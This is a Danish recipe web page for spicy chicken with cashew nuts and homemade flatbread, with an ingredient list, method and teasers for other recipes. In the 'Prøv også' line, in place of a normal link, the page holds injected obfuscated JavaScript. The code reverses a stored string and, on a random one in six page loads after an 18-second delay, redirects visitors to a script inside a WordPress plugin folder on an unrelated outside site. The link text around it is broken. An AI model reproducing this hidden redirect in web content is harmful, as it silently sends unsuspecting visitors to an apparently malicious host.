Kylling med cashewnødder og fladbrød

Dejlig krydret kyllingeret med fylde og bid fra cashewnødder og hjemmebagte fladbrød til. Server gerne med et godt glas øl og en grøn salat.

Opskrift til 4 pers.

4-5 spsk smagsneutral olie til stegning
2 tsk hvidløg, finthakkede
1 tsk ingefær, finthakket
1-2 spsk sort chilipasta*
400 g kyllingefilet i strimler
½-1 dl tomatketchup
6-7 forårsløg skåret i skrå skiver – gem et par til pynt
2 tørrede chilier udblødt i vand og skåret i strimler og renset for kerner
3 spsk fiskesovs
1 spsk sukker
100 g cashewnødder, usaltede, ristede

Fladbrød:
25 g gær
3 dl lunkent vand
1 spsk sukker
1 tsk salt
2 spsk olie
500 g mel
1 æg, sammenpisket
Sesamfrø

Tilbehør:
Forårsløg og friskhakket koriander

Prøv også $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and-panang-karry/”>And i panang-karry

Fladbrød: Opløs gæren i vand, og tilsæt sukker, salt og olie.  Ælt melet ind i blandingen, til den bliver en glat dej. Stil den til hævning i ca. 1 time. Del dejen i 12 stykker, og form hver af dem til en meget fladtrykt bolle. Læg fladbrødene på en bageplade, og lad dem hæve i 10 min. Pensl dem med et sammenpisket æg, og drys med sesamfrø. Bag brødene i ovnen i 10-12 min. ved 250 grader.
Opvarm olien i en wok, tilsæt hvidløg, ingefær, chilipasta og derefter kyllingestykkerne, og lad det stege i 5 min. Tilsæt ketchup, forårsløg og chili, og smag til med fiskesovs og sukker. Vend cashewnødderne i inden servering, og server med et drys hakkede forårsløg og fladbrød.

*Købes hos den etniske købmand eller på fx www.shopasia.dk.

 

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Pappadoms med yoghurtdip

Pappadoms er tynde og sprøde indiske brød lavet af linsemel, og ofte er de krydret med alverdens varmende krydderier. Det er muligt at lave pappadoms

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere